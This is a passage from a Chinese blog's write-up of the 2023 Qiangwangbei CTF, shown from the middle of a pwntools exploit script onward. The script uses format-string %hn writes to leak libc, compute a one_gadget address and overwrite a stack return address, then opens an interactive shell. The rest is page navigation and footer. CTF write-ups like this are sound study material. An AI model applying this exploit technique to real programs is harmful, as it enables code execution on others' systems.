class="hljs-string">&#x27;c%10$hn&#x27;</span><br>payload=payload.<span class="hljs-built_in">ljust</span>(<span class="hljs-number">0</span>x20,b<span class="hljs-string">&#x27;a&#x27;</span>)<br>payload+=<span class="hljs-built_in">p64</span>(stack_printf_ret)<br>r.<span class="hljs-built_in">send</span>(payload)<br><br>r.<span class="hljs-built_in">recvuntil</span>(b<span class="hljs-string">&#x27;0x&#x27;</span>)<br><br>libc_base=<span class="hljs-built_in">int</span>(r.<span class="hljs-built_in">recv</span>(<span class="hljs-number">12</span>),<span class="hljs-number">16</span>) - <span class="hljs-number">0</span>xf3 - libc.sym[<span class="hljs-string">&#x27;__libc_start_main&#x27;</span>]<br>one=libc_base+ogg2<br>one1=one&amp;<span class="hljs-number">0</span>xffff<br>one2=(one&gt;&gt;<span class="hljs-number">16</span>)&amp;<span class="hljs-number">0</span>xffff<br><span class="hljs-built_in">success</span>(<span class="hljs-string">&#x27;libc_base: %s&#x27;</span>,<span class="hljs-built_in">hex</span>(libc_base))<br><br>payload=b<span class="hljs-string">&#x27;%&#x27;</span>+<span class="hljs-built_in">str</span>(one2).<span class="hljs-built_in">encode</span>()+b<span class="hljs-string">&#x27;c%10$hn&#x27;</span><br>payload+=b<span class="hljs-string">&#x27;%&#x27;</span>+<span class="hljs-built_in">str</span>(one1-one2).<span class="hljs-built_in">encode</span>()+b<span class="hljs-string">&#x27;c%11$hn&#x27;</span><br>payload=payload.<span class="hljs-built_in">ljust</span>(<span class="hljs-number">0</span>x20,b<span class="hljs-string">&#x27;a&#x27;</span>)<br>payload+=<span class="hljs-built_in">p64</span>(stack_ret-<span class="hljs-number">0</span>x10+<span class="hljs-number">2</span>)+<span class="hljs-built_in">p64</span>(stack_ret-<span class="hljs-number">0</span>x10)<br>r.<span class="hljs-built_in">send</span>(payload)<br><br>r.<span class="hljs-built_in">interactive</span>()<br></code></pre></td></tr></table></figure>
<p><img src="/mdimg/qwb2023/15.png" srcset="/img/loading.gif" lazyload></p>

                
              </div>
            
            <hr/>
            <div>
              <div class="post-metas my-3">
  
    <div class="post-meta mr-3 d-flex align-items-center">
      <i class="iconfont icon-category"></i>
      

<span class="category-chains">
  
  
    
      <span class="category-chain">
        
  <a href="/categories/CTF/" class="category-chain-item">CTF</a>
  
  
    <span>></span>
    
  <a href="/categories/CTF/%E6%AF%94%E8%B5%9BWrite-Up/" class="category-chain-item">比赛Write Up</a>
  
  

  

      </span>
    
  
</span>

    </div>
  
  
    <div class="post-meta">
      <i class="iconfont icon-tags"></i>
      
        <a href="/tags/%E6%AF%94%E8%B5%9BWrite-Up/" class="print-no-link">#比赛Write Up</a>
      
    </div>
  
</div>


              
  

  <div class="license-box my-3">
    <div class="license-title">
      <div>强网杯2023 wp</div>
      <div>http://example.com/2023/12/21/强网杯2023/</div>
    </div>
    <div class="license-meta">
      
        <div class="license-meta-item">
          <div>作者</div>
          <div>J_0k3r</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>发布于</div>
          <div>2023年12月21日</div>
        </div>
      
      
      
        <div class="license-meta-item">
          <div>许可协议</div>
          <div>
            
              BY J_0K3R 
            
          </div>
        </div>
      
    </div>
    <div class="license-icon iconfont"></div>
  </div>



              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2023/12/25/docker%20%E9%83%A8%E7%BD%B2ctf%E5%8A%A8%E6%80%81%E9%9D%B6%E6%9C%BA/" title="docker 部署ctf php动态靶机">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">docker 部署ctf php动态靶机</span>
                        <span class="visible-mobile">上一篇</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2023/12/06/Quine%E6%B3%A8%E5%85%A5/" title="Quine注入">
                        <span class="hidden-mobile">Quine注入</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="margin-left: -1rem">
    <div id="toc">
  <p class="toc-header">
    <i class="iconfont icon-list"></i>
    <span>目录</span>
  </p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>
  </div>
</div>





  



  



  



  



  







    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
      <div class="col-lg-7 mx-auto nopadding-x-md">
        <div class="container custom mx-auto">
           <!--音乐--> <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/aplayer@1.10.1/dist/APlayer.min.css"> <script src="https://cdn.jsdelivr.net/npm/aplayer@1.10.1/dist/APlayer.min.js"></script> <script src="https://cdn.jsdelivr.net/npm/meting@1.2/dist/Meting.min.js"></script> <div id="player" class="aplayer aplayer-withlist aplayer-fixed" data-id="9723733050" data-server="netease" data-type="playlist" autoplay="true" data-order="list"  data-fixed="true" data-listfolded="true" data-theme="#2D8CF0"></div> 
        </div>
      </div>
    
  </main>

  <footer>
    <div class="footer-inner">
  
    <div class="footer-content">
       J_0k3r <i class="iconfont icon-love"></i> Hor1zon 
    </div>
  
  
    <div class="statistics">
  
  

  
    
      <span id="busuanzi_container_site_pv" style="display: none">
        总访问量 
        <span id="busuanzi_value_site_pv"></span>
         次
      </span>
    
    
      <span id="busuanzi_container_site_uv" style="display: none">
        总访客数 
        <span id="busuanzi_value_site_uv"></span>
         人
      </span>
    
    
  
</div>

  
  
  
</div>

  </footer>

  <!-- Scripts -->
  
  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://lib.baomitu.com/jquery/3.6.0/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>


  <script  src="https://lib.baomitu.com/typed.js/2.0.12/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
      var text = subtitle.getAttribute('data-typed-text');
      
        typing(text);
      
    })(window, document);
  </script>




  
    <script  src="/js/img-lazyload.js" ></script>
  




  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.18.2/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    window.tocbot.init(Object.assign({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      scrollSmooth    : true,
      includeTitleTags: true,
      headingsOffset  : -boardTop,
    }, CONFIG.toc));
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }

    Fluid.events.registerRefreshCallback(function() {
      if ('tocbot' in window) {
        tocbot.refresh();
        var toc = jQuery('#toc');
        if (toc.length === 0 || !tocbot) {
          return;
        }
        if (toc.find('.toc-list-item').length > 0) {
          toc.css('visibility', 'visible');
        }
      }
    });
  });
</script>


  <script src=https://lib.baomitu.com/clipboard.js/2.0.11/clipboard.min.js></script>

  <script>Fluid.plugins.codeWidget();</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/4.3.1/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));

    Fluid.events.registerRefreshCallback(function() {
      if ('anchors' in window) {
        anchors.removeAll();
        var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
        var res = [];
        for (var item of el) {
          res.push('.markdown-body > ' + item.trim());
        }
        if (CONFIG.anchorjs.placement === 'left') {
          anchors.options.class = 'anchorjs-link-left';
        }
        anchors.add(res.join(', '));
      }
    });
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  <script  src="/js/local-search.js" ></script>

  <script defer src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js" ></script>





<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">博客在允许 JavaScript 运行的环境下浏览效果更佳</div>
  </noscript>
</body>
</html>
